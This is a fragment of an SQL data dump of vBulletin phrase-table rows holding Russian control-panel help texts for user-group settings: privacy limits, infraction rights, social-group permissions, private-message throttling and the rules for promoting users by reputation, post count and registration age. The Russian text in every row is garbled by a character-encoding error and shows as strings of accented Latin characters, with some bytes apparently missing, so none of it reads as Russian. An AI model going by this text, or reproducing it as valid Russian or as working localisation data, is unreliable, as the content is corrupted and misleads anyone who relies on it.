(24782, -1, 'usergroup_edit_add_caneditprivacy_text', 'cphelptext', 'Äà ¸ò âîçìîæÃîñòü ïîëüçîâà òåëþ îãðà Ãè÷èòü äîñòóï ê Ãåêîòîðûì áëîêà ì è êà òåãîðèÿì èõ ïðîôèëÿ îò äðóãèõ ïîëüçîâà òåëåé, òà êèõ êà ê: ïîëüçîâà òåëè â èõ ñïèñêå èãÃîðèðîâà Ãèÿ; ãîñòè; ïîëüçîâà òåëè, ÃÃ¥ Ãà õîäÿùèåñÿ â èõ ñïèñêå çÃà êîìûõ; ïîëüçîâà òåëè, ÃÃ¥ Ãà õîäÿùèåñÿ â èõ ñïèñêå äðóçåé. \r\nÃîìÃèòå: Åñëè ýòî âêëþ÷åÃî, òî äëÿ Ãà ñòðîéêè îãðà Ãè÷åÃèé ïîëüçîâà òåëþ ñëåäóåò èñïîëüçîâà òü ðà çäåë \"ÊîÃôèäåÃöèà ëüÃîñòü\" â ñâî¸ì êà áèÃåòå.', 'vbulletin', 'zCarot', 1218464861, '3.8.0 Alpha 1'),
(24783, -1, 'usergroup_edit_add_caneditprivacy_title', 'cphelptext', 'Ìîæåò îãðà Ãè÷èâà òü äîñòóï ê ïðîôèëþ', 'vbulletin', 'zCarot', 1218465604, '3.8.0 Alpha 1'),
(24786, -1, 'usergroup_edit_add_cangiveinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû âûäà âà òü Ãà ðóøåÃèÿ äðóãèì ïîëüçîâà òåëÿì. Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ïîëüçîâà òåëè òà êæå ñìîãóò âèäåòü èÃôîðìà öèþ î Ãà ðóøåÃèÿõ äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24787, -1, 'usergroup_edit_add_cangiveinfraction_title', 'cphelptext', 'Ìîæåò äåëà òü çà ïèñè î Ãà ðóøåÃèÿõ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24788, -1, 'usergroup_edit_add_canlimitdiscussion_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ñìîãóò Ãà ñòðîèòü ñâîè ñîöèà ëüÃûå ãðóïïû òà ê, ÷òî òîëüêî îÃè ñìîãóò Ãà ÷èÃà òü Ãîâûå äèñêóññèè. Ãòà îïöèÿ çà âèñèò îò òîãî, âêëþ÷åÃà ëè ñîîòâåòñòâóþùà ÿ îïöèÿ â îñÃîâÃûõ Ãà ñòðîéêà õ (\"Äà òü âîçìîæÃîñòü óïðà âëÿþùèì çà ïðåòèòü ñîçäà Ãèå Ãîâûõ äèñêóññèé\").', 'vbulletin', 'zCarot', 1210938154, '3.7.1'),
(24789, -1, 'usergroup_edit_add_canlimitdiscussion_title', 'cphelptext', 'Ìîæåò çà ïðåòèòü ñîçäà Ãèå äèñêóññèé', 'vbulletin', 'zCarot', 1210938154, '3.7.1'),
(24790, -1, 'usergroup_edit_add_canmanagediscussions_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò óïðà âëÿòü äèñêóññèÿìè, êîòîðûå îà Ãà ÷à ë. Åñëè \"Ãåò\", òî ïîëüçîâà òåëü ÃÃ¥ ñìîæåò óäà ëèòü ñâîè äèñêóññèè, åñëè â Ãèõ óæå êòî-ëèáî îòâåòèë.', 'vbulletin', 'zCarot', 1212053344, '3.7.1'),
(24791, -1, 'usergroup_edit_add_canmanagediscussions_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ñâîèìè äèñêóññèÿìè â ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1212053344, '3.7.1'),
(24792, -1, 'usergroup_edit_add_canpostmessage_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò îñòà âëÿòü Ãîâûå ñîîáùåÃèÿ â ñîöèà ëüÃûõ ãðóïïà õ. ×òîáû îòâå÷à òü â äèñêóññèÿõ òðåáóåòñÿ ïðà âî Ãà ñîçäà Ãèå Ãîâûõ äèñêóññèé.', 'vbulletin', 'zCarot', 1210937879, '3.7.1'),
(24793, -1, 'usergroup_edit_add_canpostmessage_title', 'cphelptext', 'Ìîæåò îñòà âëÿòü ñîîáùåÃèÿ â ãðóïïà õ', 'vbulletin', 'zCarot', 1210937879, '3.7.1'),
(24794, -1, 'usergroup_edit_add_canreverseinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû ñÃèìà òü à êòèâÃûå èëè èñò¸êøèå Ãà ðóøåÃèÿ. Ãòà îïöèÿ òà êæå ïîçâîëÿåò ïðîñìîòðåòü äåòà ëüÃóþ èÃôîðìà öèþ î Ãà ðóøåÃèÿõ, òà ê êà ê ÷òîáû ñÃÿòü Ãà ðóøåÃèå, ÃóæÃî ïðîñìîòðåòü åãî.', 'vbulletin', 'zCarot', 1153746203, '3.6.0 Release Candidate 3'),
(24795, -1, 'usergroup_edit_add_canreverseinfraction_title', 'cphelptext', 'Ìîæåò ñÃèìà òü Ãà ðóøåÃèÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24796, -1, 'usergroup_edit_add_canseeinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû âèäåòü óðîâåÃü Ãà ðóøåÃèé ïîëüçîâà òåëåé. Ãòà îïöèÿ ÃÃ¥ ïðåäóñìà òðèâà åò ïðîñìîòð ïðè÷èà Ãà ðóøåÃèé èëè êîììåÃòà ðèåâ. Ãîëüçîâà òåëè äîëæÃû èìåòü ïðà âà äåëà òü çà ïèñè î Ãà ðóøåÃèÿõ, ÷òîáû ïðîñìîòðåòü ïîäðîáÃóþ èÃôîðìà öèþ î Ãèõ.', 'vbulletin', 'zCarot', 1150106793, '3.6.0 Beta 2'),
(24797, -1, 'usergroup_edit_add_canseeinfraction_title', 'cphelptext', 'Ìîæåò âèäåòü óðîâåÃü Ãà ðóøåÃèé äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24798, -1, 'usergroup_edit_add_canseethumbnails_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò âèäåòü ìèÃèà òþðû ïðèêðåïë¸ÃÃûõ èçîáðà æåÃèé ê ñîîáùåÃèÿì â òåìà õ, äà æå åñëè ó Ãåãî Ãåò ïðà â Ãà ñêà ÷èâà Ãèå âëîæåÃèé.', 'vbulletin', 'zCarot', 1219764597, '3.8.0 Alpha 1'),
(24799, -1, 'usergroup_edit_add_canseethumbnails_title', 'cphelptext', 'Ìîæåò âèäåòü ìèÃèà òþðû', 'vbulletin', 'zCarot', 1219764597, '3.8.0 Alpha 1'),
(24800, -1, 'usergroup_edit_add_canuploadgroupicon_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò çà ãðóæà òü èêîÃêè ñîöèà ëüÃûì ãðóïïà ì, êîòîðûìè óïðà âëÿåò.', 'vbulletin', 'zCarot', 1224674885, '3.8.0 Beta 2'),
(24801, -1, 'usergroup_edit_add_canuploadgroupicon_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü èêîÃêè ñîöèà ëüÃûõ ãðóïï', 'vbulletin', 'zCarot', 1216130033, '3.8.0 Alpha 1'),
(24802, -1, 'usergroup_edit_add_groupiconmaxsize_text', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà èêîÃêè ñîöèà ëüÃûõ ãðóïï (â áà éòà õ). \r\n\r\nÃîìÃèòå: Âñå èêîÃêè ñîöèà ëüÃûõ ãðóïï îãðà Ãè÷åÃû ïî ðà çìåðó èçîáðà æåÃèÿ (ìà êñèìà ëüÃî 200õ200 ïèêñåëåé).', 'vbulletin', 'Jelsoft', 1224675066, '3.8.0 Beta 2'),
(24803, -1, 'usergroup_edit_add_groupiconmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà èêîÃêè ñîöèà ëüÃûõ ãðóïï (â áà éòà õ) ', 'vbulletin', 'zCarot', 1216130294, '3.8.0 Alpha 1'),
(24804, -1, 'usergroup_edit_add_maximumsocialgroups_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì îãðà Ãè÷èòü êîëè÷åñòâî ñîöèà ëüÃûõ ãðóïï, êîòîðûìè ìîæåò îäÃîâðåìåÃÃî óïðà âëÿòü ïîëüçîâà òåëü. Åñëè ïîëüçîâà òåëü äîñòèãÃåò ïðåäåëà , òî åìó áóäåò ïðåäëîæåÃî óäà ëèòü îäÃó èç ñóùåñòâóþùèõ ãðóïï. \r\nÅñëè óêà çà òü 0, òî îãðà Ãè÷åÃèÿ áóäóò ñÃÿòû.', 'vbulletin', 'zCarot', 1218710074, '3.8.0 Alpha 1'),
(24805, -1, 'usergroup_edit_add_maximumsocialgroups_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ãðóïï', 'vbulletin', 'zCarot', 1218710074, '3.8.0 Alpha 1'),
(24806, -1, 'usergroup_edit_add_pmthrottlequantity_text', 'cphelptext', 'Óêà æèòå ìà êñèìà ëüÃîå êîëè÷åñòâî ëè÷Ãûõ ñîîáùåÃèé, êîòîðûå ñìîæåò îòïðà âèòü ïîëüçîâà òåëü çà ïåðèîä âðåìåÃÃîãî îãðà Ãè÷åÃèÿ, êîòîðûé óêà çà à â îñÃîâÃûõ Ãà ñòðîéêà õ. \r\nÅñëè óêà çà òü 0, òî îãðà Ãè÷åÃèÿ áóäóò ñÃÿòû.', 'vbulletin', 'zCarot', 1216395202, '3.8.0 Alpha 1'),
(24807, -1, 'usergroup_edit_add_pmthrottlequantity_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé äëÿ âðåìåÃÃîãî îãðà Ãè÷åÃèÿ', 'vbulletin', 'zCarot', 1216395146, '3.8.0 Alpha 1'),
(24808, -1, 'usergroup_edit_add_requirehvcheck_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ýòîé ãðóïïû áóäóò ïðîõîäèòü ïðîâåðêó, îòäåëÿþùóþ ëþäåé îò ðîáîòîâ, âî âðåìÿ âûïîëÃÃ¥Ãèÿ äåéñòâèé, óêà çà ÃÃûõ â îñÃîâÃûõ Ãà ñòðîéêà õ.', 'vbulletin', 'zCarot', 1216640146, '3.8.0 Alpha 1'),
(24809, -1, 'usergroup_edit_add_requirehvcheck_title', 'cphelptext', 'Îòäåëÿòü ëþäåé îò ðîáîòîâ ïðè âûïîëÃÃ¥Ãèè îïðåäåë¸ÃÃûõ äåéñòâèé', 'vbulletin', 'zCarot', 1216640146, '3.8.0 Alpha 1'),
(24810, -1, 'usergroup_edit_add_canmanageownprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâà òåëü óïðà âëÿòü ïóáëè÷Ãûìè ñîîáùåÃèÿìè, êîòîðûå Ãà õîäÿòñÿ â åãî ïðîôèëå. Ãîä óïðà âëåÃèåì ïîÃèìà åòñÿ ïðîâåðêà , ðåäà êòèðîâà Ãèå è ìÿãêîå óäà ëåÃèå òà êèõ ñîîáùåÃèé.', 'vbulletin', 'zCarot', 1197373222, '3.7.0 Beta 1'),
(24811, -1, 'usergroup_edit_add_canmanageownprofile_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ïóáëè÷Ãûìè ñîîáùåÃèÿìè â ñâî¸ì ïðîôèëå', 'vbulletin', 'zCarot', 1192049894, '3.7.0 Beta 1'),
(24812, -1, 'usergroup_edit_add_canmessageownprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâà òåëü ðà çìåùà òü ïóáëè÷Ãûå ñîîáùåÃèå â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1197373159, '3.7.0 Beta 1'),
(24813, -1, 'usergroup_edit_add_canmessageownprofile_title', 'cphelptext', 'Ìîæåò îñòà âëÿòü ïóáëè÷Ãûå ñîîáùåÃèÿ â ñâî¸ì ïðîôèëå', 'vbulletin', 'zCarot', 1197373202, '3.7.0 Beta 1'),
(24814, -1, 'usergroup_edit_add_canmessageothersprofile_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâà òåëü ðà çìåùà òü ïóáëè÷Ãûå ñîîáùåÃèå â ÷óæèõ ïðîôèëÿõ.', 'vbulletin', 'zCarot', 1197373232, '3.7.0 Beta 1'),
(24815, -1, 'usergroup_edit_add_canmessageothersprofile_title', 'cphelptext', 'Ìîæåò îñòà âëÿòü ïóáëè÷Ãûå ñîîáùåÃèÿ â ÷óæèõ ïðîôèëÿõ', 'vbulletin', 'zCarot', 1197373239, '3.7.0 Beta 1'),
(24816, -1, 'usergroup_edit_add_caneditownmessages_text', 'cphelptext', 'Îïðåäåëÿåò, ìîæåò ëè ïîëüçîâà òåëü ðåäà êòèðîâà òü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ, Ãà õîäÿùèåñÿ êà ê â ñâî¸ì, òà ê è â ÷óæèõ ïðîôèëÿõ. ÎòÃåñèòåñü âÃèìà òåëüÃî ê ïîõîæåìó ïðà âó - Ìîæåò óïðà âëÿòü ïóáëè÷Ãûìè ñîîáùåÃèÿìè â ñâî¸ì ïðîôèëå , êîòîðîå ïðè ðà çðåøåÃèè äà ñò âîçìîæÃîñòü ðåäà êòèðîâà òü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ , åñëè îÃè áóäóò Ãà õîäèòüñÿ â ïðîôèëå åãî à âòîðà .', 'vbulletin', 'zCarot', 1204246428, '3.7.0 Beta 6'),
(24817, -1, 'usergroup_edit_add_caneditownmessages_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1197373214, '3.7.0 Beta 1'),
(24818, -1, 'usergroup_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óïðà âëÿòü ïðåäóñòà ÃîâëåÃÃûìè, äîïîëÃèòåëüÃûìè è ïóáëè÷Ãûìè ãðóïïà ìè ïîëüçîâà òåëåé. \r\n Ãðåäóñòà ÃîâëåÃÃûå ãðóïïû - ýòî òå, êîòîðûå ñîçäà þòñÿ ïðè óñòà Ãîâêå ôîðóìà . ÄîïîëÃèòåëüÃûå - ýòî ñîçäà ÃÃûå âà ìè ãðóïïû. Ãóáëè÷Ãûå - ýòî ãðóïïû, â êîòîðûå ìîãóò âñòóïà òü ïîëüçîâà òåëè, ïîñëà â çà ÿâêó Ãà âñòóïëåÃèå (åñëè äëÿ ýòèõ ãðóïï âêëþ÷åÃà îïöèÿ \"Ãóáëè÷Ãà ÿ ãðóïïà \"). \r\n ÊîëîÃêà ÎñÃîâÃûå ïîëüçîâà òåëè îòîáðà æà åò êîëè÷åñòâî ïîëüçîâà òåëåé, äëÿ êîòîðûõ äà ÃÃà ÿ ãðóïïà ÿâëÿåòñÿ îñÃîâÃîé. ÊîëîÃêà ÄîïîëÃèò. ïîëüçîâà òåëè îòîáðà æà åò êîëè÷åñòâî ïîëüçîâà òåëåé, äëÿ êîòîðûõ ýòà ãðóïïà ÿâëÿåòñÿ äîïîëÃèòåëüÃîé.  êîëîÃêå Óïðà âëåÃèå ðà ñïîëà ãà åòñÿ ìåÃþ ñ âîçìîæÃûìè îïöèÿìè äëÿ óïðà âëåÃèÿ êà æäîé ãðóïïîé. \r\n  ðà çäåëå Ãóáëè÷Ãûå ãðóïïû åñòü äâà äîïîëÃèòåëüÃûõ ñòîëáöà : \r\nÇà ÿâêè Ãà âñòóïëåÃèå - îòîáðà æà åò êîëè÷åñòâî îæèäà þùèõ îäîáðåÃèÿ/îòêëîÃÃ¥Ãèÿ çà ÿâîê Ãà âñòóïëåÃèå â äà ÃÃóþ ãðóïïó ïîëüçîâà òåëåé (ïîëüçîâà òåëè ìîãóò ïîñëà òü çà ÿâêó Ãà âñòóïëåÃèå â ãðóïïó, åñëè äëÿ Ãå¸ âêëþ÷åÃà îïöèÿ \"Ãóáëè÷Ãà ÿ ãðóïïà \"). \r\nËèäåð ãðóïïû - îòîáðà æà åò òåêóùèõ ëèäåðîâ ãðóïïû. Âû ìîæåòå óäà ëèòü ñóùåñòâóþùåãî ëèäåðà ãðóïïû Ãà æà â Ãà \"Óäà ëèòü\". ×òîáû äîáà âèòü Ãîâîãî ëèäåðà ãðóïïû âûáåðèòå îïöèþ \"Äîáà âèòü ëèäåðà ãðóïïû\" èç ìåÃþ ñïðà âà .', 'vbulletin', '', 0, ''),
(24819, -1, 'usergroup_modify_title', 'cphelptext', 'Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24820, -1, 'usergroup_modifypromotion_text', 'cphelptext', 'Ãèæå îòîáðà æåà ñïèñîê òåêóùèõ ïîâûøåÃèé (åñëè îÃè îïðåäåëåÃû). ÃîâûøåÃèÿ ìîãóò èñïîëüçîâà òüñÿ äëÿ óïðà âëåÃèÿ ïðà âà ìè äîñòóïà è äðóãèìè Ãà ñòðîéêà ìè ãðóïïû, îñÃîâûâà ÿñü Ãà ðåïóòà öèè ïîëüçîâà òåëåé, ñðîêà äà âÃîñòè èõ ðåãèñòðà öèè è êîëè÷åñòâå îïóáëèêîâà ÃÃûõ ñîîáùåÃèé. \r\n ÃîâûøåÃèÿ Ãà ýòîé ñòðà Ãèöå ñãðóïïèðîâà Ãû ïî ãðóïïà ì ïîëüçîâà òåëåé, ê êîòîðûì îÃè ïðèìåÃÿþòñÿ. Çà ãîëîâêè ãðóïï âî âñþ øèðèÃó ñòðà Ãèöû îòîáðà æà þò, äëÿ êà êîé èç ãðóïï äà ÃÃîå ïîâûøåÃèå. Ãîä Ãèìè ðà ñïîëîæåÃû êîëîÃêè ñ èÃôîðìà öèåé î òåêóùèõ Ãà ñòðîéêà õ êà æäîãî ïîâûøåÃèÿ. Ãðóïïà ïîëüçîâà òåëåé îòîáðà æà åò ãðóïïó, äî êîòîðîé ïîëüçîâà òåëü áóäåò ïîâûøåà (ïîÃèæåÃ). Ñïîñîá ïîâûøåÃèÿ îòîáðà æà åò, áóäåò ëè èçìåÃÃ¥Ãà îñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëÿ â ñëó÷à å ïîâûøåÃèÿ, ëèáî ïîëüçîâà òåëü áóäåò äîïîëÃèòåëüÃî äîáà âëåà â Ãîâóþ ãðóïïó. Ñòðà òåãèÿ ïîâûøåÃèÿ ïîêà çûâà åò, êà êèå èç ñëåäóþùèõ òð¸õ óñëîâèé äîëæÃû áûòü âûïîëÃÃ¥Ãû, ÷òîáû ïîâûøåÃèå ñîñòîÿëîñü.', 'vbulletin', '', 0, ''),
(24821, -1, 'usergroup_modifypromotion_title', 'cphelptext', 'ÃîâûøåÃèÿ', 'vbulletin', '', 0, ''),
(24822, -1, 'usergroup_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå óäà ëåÃèÿ óêà çà ÃÃîé ãðóïïû. Ãðîâåðüòå ïðà âèëüÃîñòü èìåÃè óäà ëÿåìîé ãðóïïû è Ãà æìèòå \"Äà \" äëÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(24823, -1, 'usergroup_remove_title', 'cphelptext', 'Óäà ëèòü ãðóïïó', 'vbulletin', '', 0, ''),
(24824, -1, 'usergroup_removeleader_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå óäà ëåÃèÿ ëèäåðà óêà çà ÃÃîé ãðóïïû. Ãðîâåðüòå ïðà âèëüÃîñòü èìåÃè ïîëüçîâà òåëÿ Ãèæå è Ãà æìèòå \"Äà \" äëÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(24825, -1, 'usergroup_removeleader_title', 'cphelptext', 'Óäà ëåÃèå ëèäåðà ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24826, -1, 'usergroup_removepromotion_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå óäà ëåÃèÿ óêà çà ÃÃîãî ïîâûøåÃèÿ. Ãà æìèòå \"Äà \" äëÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(24827, -1, 'usergroup_removepromotion_title', 'cphelptext', 'Óäà ëåÃèå ïîâûøåÃèÿ', 'vbulletin', '', 0, ''),
(24828, -1, 'usergroup_updatepromotion_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì äîáà âëÿòü è ðåäà êòèðîâà òü ïîâûøåÃèå. Çà ïîëÃèòå èëè îòðåäà êòèðóéòå Ãèæåðà ñïîëîæåÃÃûå ïîëÿ è Ãà æìèòå êÃîïêó \"Ñîõðà Ãèòü\". Ñìîòðèòå ñïðà âêó Ãèæå äëÿ ïîëó÷åÃèÿ èÃôîðìà öèè î êà æäîé èç îïöèé.', 'vbulletin', '', 0, ''),
(24829, -1, 'usergroup_updatepromotion_title', 'cphelptext', 'Äîáà âëåÃèå/ðåäà êòèðîâà Ãèå ïîâûøåÃèÿ', 'vbulletin', '', 0, ''),
(24830, -1, 'usergroup_updatepromotion_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâà òåëåé, â êîòîðîé áóäåò äåéñòâîâà òü ýòî ïîâûøåÃèå. Ãîëüçîâà òåëü äîëæåà áûòü ÷ëåÃîì ýòîé ãðóïïû, ÷òîáû åãî êà ñà ëîñü ýòî ïîâûøåÃèå.', 'vbulletin', '', 0, ''),
(24831, -1, 'usergroup_updatepromotion_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24832, -1, 'usergroup_updatepromotion_reputationtype_text', 'cphelptext', 'Ãòî îïåðà òîð ñðà âÃÃ¥Ãèÿ, êîòîðûé èñïîëüçóåòñÿ äëÿ çÃà ÷åÃèé ðåïóòà öèè, ââåä¸ÃÃûõ âûøå. \r\n Ãà ïðèìåð, åñëè âû õîòèòå, ÷òîáû ïîâûøåÃèå áà çèðîâà ëîñü Ãà óðîâÃÃ¥ ðåïóòà öèè, âà ì òðåáóåòñÿ óêà çà òü óðîâåÃü ðåïóòà öèè â ïîëå âûøå è óñòà Ãîâèòü îïåðà òîð ñðà âÃÃ¥Ãèÿ â \"Ãîëüøå èëè ðà âÃî\" . Òîãäà , ïîñëå äîñòèæåÃèÿ ïîëüçîâà òåëåì óêà çà ÃÃîãî óðîâÃÿ ðåïóòà öèè, îà áóäåò ïîâûøåÃ. Ñ äðóãîé ñòîðîÃû, åñëè âû õîòèòå, ÷òîáû ïîÃèæåÃèå áà çèðîâà ëîñü Ãà óðîâÃÃ¥ ðåïóòà öèè, âà ì òðåáóåòñÿ óñòà Ãîâèòü Ãèçêèé óðîâåÃü ðåïóòà öèè â ïîëå âûøå è óñòà Ãîâèòü îïåðà òîð ñðà âÃÃ¥Ãèÿ â \"ÌåÃüøå\" . Òîãäà , ïîñëå ïîÃèæåÃèÿ óðîâÃÿ ðåïóòà öèè ïîëüçîâà òåëÿ Ãèæå óêà çà ÃÃîãî óðîâÃÿ, îà áóäåò ïîÃèæåÃ.\r\n\r\nÃòî ÃÃ¥ ïðèìåÃèìî ê êîëè÷åñòâó ñîîáùåÃèé.', 'vbulletin', 'zCarot', 1199738264, '3.7.0 Beta 4'),
(24833, -1, 'usergroup_updatepromotion_reputationtype_title', 'cphelptext', 'Ñïîñîá ñðà âÃÃ¥Ãèÿ', 'vbulletin', '', 0, ''),
(24834, -1, 'usergroup_updatepromotion_reputation_text', 'cphelptext', 'Ãòî óðîâåÃü ðåïóòà öèè ïîëüçîâà òåëÿ, êîòîðûé îïðåäåëÿåò, äîëæåà ëè ïîëüçîâà òåëü áûòü ïîâûøåÃ. \r\n Åñëè óðîâåÃü ðåïóòà öèè ïîëüçîâà òåëÿ áîëüøå èëè ðà âåà ëèáî ìåÃüøå (â çà âèñèìîñòè îò ïðåäûäóùåé îïöèè) ýòîãî ÷èñëà , ïîëüçîâà òåëü áóäåò ïîâûøåÃ. Ãòî çÃà ÷åÃèå áóäåò èñïîëüçîâà Ãî, åñëè ðåïóòà öèÿ âêëþ÷åÃà â ñòðà òåãèþ ïîâûøåÃèÿ Ãèæå.', 'vbulletin', '', 0, ''),
(24835, -1, 'usergroup_updatepromotion_reputation_title', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè', 'vbulletin', '', 0, ''),
(24836, -1, 'usergroup_updatepromotion_date_text', 'cphelptext', 'Ãòî ÷èñëî äÃåé, ïðîøåäøèõ ñ ìîìåÃòà ðåãèñòðà öèè ïîëüçîâà òåëÿ, êîòîðîå îïðåäåëÿåò äîëæåà ëè ïîëüçîâà òåëü áûòü ïîâûøåÃ. \r\nÃòî çÃà ÷åÃèå áóäåò èñïîëüçîâà Ãî òîëüêî åñëè \"Äà òà \" âêëþ÷åÃà â ñòðà òåãèþ ïîâûøåÃèÿ.', 'vbulletin', 'zCarot', 1199985280, '3.7.0 Beta 4'),
(24837, -1, 'usergroup_updatepromotion_date_title', 'cphelptext', 'Çà ðåãèñòðèðîâà à äÃåé Ãà çà ä', 'vbulletin', '', 0, ''),
(24838, -1, 'usergroup_updatepromotion_posts_text', 'cphelptext', 'Ãòî ÷èñëî îïóáëèêîâà ÃÃûõ ñîîáùåÃèé, êîòîðîå îïðåäåëÿåò, äîëæåà ëè ïîëüçîâà òåëü áûòü ïîâûøåÃ. \r\nÃòî çÃà ÷åÃèå áóäåò èñïîëüçîâà Ãî òîëüêî åñëè \"ÑîîáùåÃèÿ\" âêëþ÷åÃû â ñòðà òåãèþ ïîâûøåÃèÿ.', 'vbulletin', 'zCarot', 1199985268, '3.7.0 Beta 4'),
(24839, -1, 'usergroup_updatepromotion_posts_title', 'cphelptext', 'ÑîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(24840, -1, 'usergroup_updatepromotion_strategy_text', 'cphelptext', 'Âûáåðèòå, êà êèå èç âûøåðà ñïîëîæåÃÃûõ óñëîâèé äîëæÃû âûïîëÃÿòüñÿ äëÿ ïîâûøåÃèÿ. Óñëîâèÿ â ñêîáêà õ äîëæÃû âûïîëÃÿòüñÿ ïåðâûìè. \r\n Ãà ïðèìåð, åñëè âà øè Ãà ñòðîéêè òà êîâû: \r\n \r\nÑïîñîá ñðà âÃÃ¥Ãèÿ ðåïóòà öèé = \"Ãîëüøå èëè ðà âÃî\" \r\nÓðîâåÃü ðåïóòà öèè = 1000 \r\nÇà ðåãèñòðèðîâà à äÃåé Ãà çà ä = 30 \r\nÑîîáùåÃèÿ = 100 \r\nÑòðà òåãèÿ ïîâûøåÃèÿ = \"ñîîáùåÃèÿ È (ðåïóòà öèÿ ÈËÈ äà òà )\" \r\n Åñëè ðåïóòà öèÿ ïîëüçîâà òåëÿ 1100, îà çà ðåãèñòðèðîâà à 20 äÃåé è èìååò 150 ñîîáùåÃèé, òî îà ìîæåò áûòü ïîâûøåà ïîòîìó ÷òî: \r\nÑîîáùåÃèé: 150 >= 100 (âûïîëÃÿåòñÿ) \r\nÃåïóòà öèÿ: 1100 >= 1000 (âûïîëÃÿåòñÿ) \r\nÄà òà : 20 >= 30 (ÃÃ¥ âûïîëÃÿåòñÿ) \r\n ... ñ èñïîëüçîâà Ãèåì ñòðà òåãèè ïîâûøåÃèÿ \'ñîîáùåÃèÿ È (ðåïóòà öèÿ ÈËÈ äà òà )\' èìååì: \r\n_âûïîëÃÿåòñÿ_ È (_âûïîëÃÿåòñÿ_ ÈËÈ _ÃÃ¥_âûïîëÃÿåòñÿ_) \r\n= _âûïîëÃÿåòñÿ_ È (_âûïîëÃÿåòñÿ_) \r\n= _âûïîëÃÿåòñÿ_', 'vbulletin', '', 0, ''),
(24841, -1, 'usergroup_updatepromotion_strategy_title', 'cphelptext', 'Ñòðà òåãèÿ ïîâûøåÃèÿ', 'vbulletin', '', 0, ''),
(24842, -1, 'usergroup_updatepromotion_type_text', 'cphelptext', 'Êà êîé ñïîñîá ïîâûøåÃèÿ âûáðà òü çà âèñèò îò òîãî, êà ê âû ñêîÃôèãóðèðîâà ëè âà øè ãðóïïû è ïðà âà äîñòóïà . Âîîáùå, åñëè ïîâûøåÃèå âëå÷¸ò çà ñîáîé òîëüêî ÃåçÃà ÷èòåëüÃûå èçìåÃÃ¥Ãèÿ ïðà â è ðà çðåøåÃèé, ïðîùå ñîçäà òü Ãîâóþ ãðóïïó, êîòîðà ÿ ïðåäîñòà âèò Ãîâûå ïðà âà è ðà çðåøåÃèÿ, è çà òåì äîáà âèòü ïîâûøåÃèå äî ÷ëåÃñòâà â ýòîé ãðóïïå êà ê â äîïîëÃèòåëüÃîé. Åñëè ïîâûøåÃèå âëå÷¸ò çà ñîáîé ìÃîæåñòâî èçìåÃÃ¥Ãèé, òî, âîçìîæÃî, èìååò ñìûñë â ðåçóëüòà òå ïîâûøåÃèÿ èçìåÃÿòü îñÃîâÃóþ ãðóïïó.', 'vbulletin', '', 0, ''),
(24843, -1, 'usergroup_updatepromotion_type_title', 'cphelptext', 'Ñïîñîá ïîâûøåÃèÿ', 'vbulletin', '', 0, ''),
